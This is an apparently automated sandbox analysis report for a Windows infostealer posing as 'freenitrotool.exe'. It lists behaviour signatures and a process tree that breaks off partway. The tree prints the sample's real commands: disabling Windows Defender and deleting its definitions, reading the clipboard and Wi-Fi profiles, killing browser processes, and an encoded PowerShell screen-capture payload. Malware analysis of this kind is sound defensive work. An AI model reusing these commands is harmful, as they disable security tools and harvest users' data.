Resubmissions

16/06/2024, 15:29

240616-sw2krsydjd 10

16/06/2024, 15:27

240616-sv1xvasfkr 1

Analysis

  • max time kernel
    67s
  • max time network
    69s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    16/06/2024, 15:29

General

  • Target

    https://gofile.io/d/CWBZ0R

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 2 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 8 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 60 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/CWBZ0R
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1388
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa5b7b9758,0x7ffa5b7b9768,0x7ffa5b7b9778
      2⤵
        PID:2872
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1540 --field-trial-handle=1804,i,7159488528835739697,4768506569763361457,131072 /prefetch:2
        2⤵
          PID:4428
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1812 --field-trial-handle=1804,i,7159488528835739697,4768506569763361457,131072 /prefetch:8
          2⤵
            PID:2900
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1700 --field-trial-handle=1804,i,7159488528835739697,4768506569763361457,131072 /prefetch:8
            2⤵
              PID:1312
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2900 --field-trial-handle=1804,i,7159488528835739697,4768506569763361457,131072 /prefetch:1
              2⤵
                PID:3652
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2916 --field-trial-handle=1804,i,7159488528835739697,4768506569763361457,131072 /prefetch:1
                2⤵
                  PID:4620
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4392 --field-trial-handle=1804,i,7159488528835739697,4768506569763361457,131072 /prefetch:1
                  2⤵
                    PID:5024
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4404 --field-trial-handle=1804,i,7159488528835739697,4768506569763361457,131072 /prefetch:8
                    2⤵
                      PID:4672
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 --field-trial-handle=1804,i,7159488528835739697,4768506569763361457,131072 /prefetch:8
                      2⤵
                        PID:2780
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3724 --field-trial-handle=1804,i,7159488528835739697,4768506569763361457,131072 /prefetch:1
                        2⤵
                          PID:2216
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5276 --field-trial-handle=1804,i,7159488528835739697,4768506569763361457,131072 /prefetch:8
                          2⤵
                            PID:4236
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5300 --field-trial-handle=1804,i,7159488528835739697,4768506569763361457,131072 /prefetch:8
                            2⤵
                              PID:4552
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4336 --field-trial-handle=1804,i,7159488528835739697,4768506569763361457,131072 /prefetch:8
                              2⤵
                                PID:3220
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5612 --field-trial-handle=1804,i,7159488528835739697,4768506569763361457,131072 /prefetch:8
                                2⤵
                                  PID:3536
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5132 --field-trial-handle=1804,i,7159488528835739697,4768506569763361457,131072 /prefetch:8
                                  2⤵
                                    PID:2824
                                  • C:\Users\Admin\Downloads\freenitrotool.exe
                                    "C:\Users\Admin\Downloads\freenitrotool.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:2072
                                    • C:\Users\Admin\Downloads\freenitrotool.exe
                                      "C:\Users\Admin\Downloads\freenitrotool.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:4992
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\freenitrotool.exe'"
                                        4⤵
                                          PID:5040
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\freenitrotool.exe'
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1560
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                          4⤵
                                            PID:2556
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                              5⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:196
                                            • C:\Program Files\Windows Defender\MpCmdRun.exe
                                              "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                              5⤵
                                              • Deletes Windows Defender Definitions
                                              PID:5848
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                            4⤵
                                              PID:2024
                                              • C:\Windows\system32\tasklist.exe
                                                tasklist /FO LIST
                                                5⤵
                                                • Enumerates processes with tasklist
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4272
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                              4⤵
                                                PID:4620
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4444
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                4⤵
                                                  PID:4012
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-Clipboard
                                                    5⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2880
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                  4⤵
                                                    PID:380
                                                    • C:\Windows\system32\tasklist.exe
                                                      tasklist /FO LIST
                                                      5⤵
                                                      • Enumerates processes with tasklist
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4736
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    4⤵
                                                      PID:64
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        5⤵
                                                          PID:3536
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                        4⤵
                                                          PID:4712
                                                          • C:\Windows\system32\netsh.exe
                                                            netsh wlan show profile
                                                            5⤵
                                                              PID:2888
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "systeminfo"
                                                            4⤵
                                                              PID:4940
                                                              • C:\Windows\system32\systeminfo.exe
                                                                systeminfo
                                                                5⤵
                                                                • Gathers system information
                                                                PID:3524
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                              4⤵
                                                                PID:3348
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                  5⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:4072
                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wudgxayc\wudgxayc.cmdline"
                                                                    6⤵
                                                                      PID:5692
                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB24.tmp" "c:\Users\Admin\AppData\Local\Temp\wudgxayc\CSCCA5B956D75B404F994B9B4AB5A8B5.TMP"
                                                                        7⤵
                                                                          PID:5924
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                    4⤵
                                                                      PID:2500
                                                                      • C:\Windows\system32\tree.com
                                                                        tree /A /F
                                                                        5⤵
                                                                          PID:5200
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                        4⤵
                                                                          PID:5248
                                                                          • C:\Windows\system32\tree.com
                                                                            tree /A /F
                                                                            5⤵
                                                                              PID:5360
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                            4⤵
                                                                              PID:5460
                                                                              • C:\Windows\system32\tree.com
                                                                                tree /A /F
                                                                                5⤵
                                                                                  PID:5636
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                4⤵
                                                                                  PID:5680
                                                                                  • C:\Windows\system32\tree.com
                                                                                    tree /A /F
                                                                                    5⤵
                                                                                      PID:5768
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                    4⤵
                                                                                      PID:5788
                                                                                      • C:\Windows\system32\tree.com
                                                                                        tree /A /F
                                                                                        5⤵
                                                                                          PID:5864
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1388"
                                                                                        4⤵
                                                                                          PID:5992
                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                            taskkill /F /PID 1388
                                                                                            5⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:6044
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2872"
                                                                                          4⤵
                                                                                            PID:6076
                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                              taskkill /F /PID 2872
                                                                                              5⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:6124
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4428"
